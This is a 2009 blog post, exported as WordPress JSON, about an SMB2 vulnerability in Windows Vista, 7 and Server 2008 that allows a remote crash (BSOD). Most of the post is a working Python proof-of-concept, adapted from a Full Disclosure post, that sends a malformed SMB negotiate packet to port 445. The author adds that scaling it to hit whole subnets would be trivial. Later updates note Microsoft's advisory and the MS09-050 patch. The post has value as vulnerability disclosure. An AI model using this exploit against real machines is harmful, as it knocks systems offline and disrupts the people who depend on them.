{"id":1901,"date":"2009-09-08T15:48:44","date_gmt":"2009-09-08T19:48:44","guid":{"rendered":"http:\/\/nuxx.net\/blog\/?p=1901"},"modified":"2009-10-13T23:02:59","modified_gmt":"2009-10-14T03:02:59","slug":"ms09-0","status":"publish","type":"post","link":"https:\/\/nuxx.net\/blog\/2009\/09\/08\/ms09-0\/","title":{"rendered":"MS09-0??"},"content":{"rendered":"<p><center><\/p>\n<table cellpadding=1>\n<tr>\n<td bgcolor=\"black\"><a href=\"https:\/\/nuxx.net\/gallery\/v\/moblog\/090908-150020.jpg.html?g2_imageViewsIndex=2\"><img decoding=\"async\" src=\"https:\/\/nuxx.net\/gallery\/d\/86143-2\/090908-150020.jpg\" height=480 width=640 border=0 title=\"Unpatched vulnerability in Windows Vista, 7, and Server 2008's SMB2 implementation in SRV2.SYS allowing for a remote BSOD.\"><\/a><\/td>\n<\/tr>\n<\/table>\n<p><\/center><\/p>\n<p>As is normal for a <a href=\"http:\/\/en.wikipedia.org\/wiki\/Patch_Tuesday\">Patch Tuesday<\/a>, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7, or Server 2008 which allows easy remote BSODs using a single packet. This code below, which works under Python 2.6 on Windows, was very slightly adapted from <a href=\"http:\/\/seclists.org\/fulldisclosure\/2009\/Sep\/0039.html\">this post to Full Disclosure<\/a>.<\/p>\n<blockquote>\n<pre>import socket<\/pre>\n<pre>host = \"127.0.0.1\", 445<\/pre>\n<pre>buff = (<\/pre>\n<pre>\"\\x00\\x00\\x00\\x90\" # Begin SMB header: Session message<\/pre>\n<pre>\"\\xff\\x53\\x4d\\x42\" # Server Component: SMB<\/pre>\n<pre>\"\\x72\\x00\\x00\\x00\" # Negociate Protocol<\/pre>\n<pre>\"\\x00\\x18\\x53\\xc8\" # Operation 0x18 & sub 0xc853<\/pre>\n<pre>\"\\x00\\x26\"# Process ID High: --> :) normal value should be \"\\x00\\x00\"<\/pre>\n<pre>\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xfe\"<\/pre>\n<pre>\"\\x00\\x00\\x00\\x00\\x00\\x6d\\x00\\x02\\x50\\x43\\x20\\x4e\\x45\\x54\"<\/pre>\n<pre>\"\\x57\\x4f\\x52\\x4b\\x20\\x50\\x52\\x4f\\x47\\x52\\x41\\x4d\\x20\\x31\"<\/pre>\n<pre>\"\\x2e\\x30\\x00\\x02\\x4c\\x41\\x4e\\x4d\\x41\\x4e\\x31\\x2e\\x30\\x00\"<\/pre>\n<pre>\"\\x02\\x57\\x69\\x6e\\x64\\x6f\\x77\\x73\\x20\\x66\\x6f\\x72\\x20\\x57\"<\/pre>\n<pre>\"\\x6f\\x72\\x6b\\x67\\x72\\x6f\\x75\\x70\\x73\\x20\\x33\\x2e\\x31\\x61\"<\/pre>\n<pre>\"\\x00\\x02\\x4c\\x4d\\x31\\x2e\\x32\\x58\\x30\\x30\\x32\\x00\\x02\\x4c\"<\/pre>\n<pre>\"\\x41\\x4e\\x4d\\x41\\x4e\\x32\\x2e\\x31\\x00\\x02\\x4e\\x54\\x20\\x4c\"<\/pre>\n<pre>\"\\x4d\\x20\\x30\\x2e\\x31\\x32\\x00\\x02\\x53\\x4d\\x42\\x20\\x32\\x2e\"<\/pre>\n<pre>\"\\x30\\x30\\x32\\x00\"<\/pre>\n<pre>)<\/pre>\n<pre>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<\/pre>\n<pre>s.connect(host)<\/pre>\n<pre>s.send(buff)<\/pre>\n<pre>s.close()<\/pre>\n<\/blockquote>\n<p><strong>UPDATE:<\/strong> Microsoft has posted <a href=\"http:\/\/www.microsoft.com\/technet\/security\/advisory\/975497.mspx\">975497 &#8211; Vulnerabilities in SMB Could Allow Remote Code Execution<\/a> which states:<\/p>\n<blockquote><p><cite>Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.<\/cite><\/p><\/blockquote>\n<p>I&#8217;m not sure how they define attack, but that BSOD above sure looks like one and making something quick to hit whole subnets in a go would be trivial. <\/p>\n<p><strong>UPDATE 2:<\/strong> This was fixed on 13-Oct-2009 in <a href=\"http:\/\/www.microsoft.com\/technet\/security\/bulletin\/ms09-050.mspx\">MS09-050<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As is normal for a Patch Tuesday, Microsoft released a bunch of patches. Unfortunately, none of them fix a vulnerability in SMB2 on Vista, 7,&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/nuxx.net\/blog\/2009\/09\/08\/ms09-0\/\">Continue reading<span class=\"screen-reader-text\">MS09-0??<\/span><\/a><\/div>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[],"class_list":["post-1901","post","type-post","status-publish","format-standard","hentry","category-computers","entry"],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/comments?post=1901"}],"version-history":[{"count":6,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901\/revisions"}],"predecessor-version":[{"id":1980,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/posts\/1901\/revisions\/1980"}],"wp:attachment":[{"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/media?parent=1901"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/categories?post=1901"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nuxx.net\/blog\/wp-json\/wp\/v2\/tags?post=1901"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}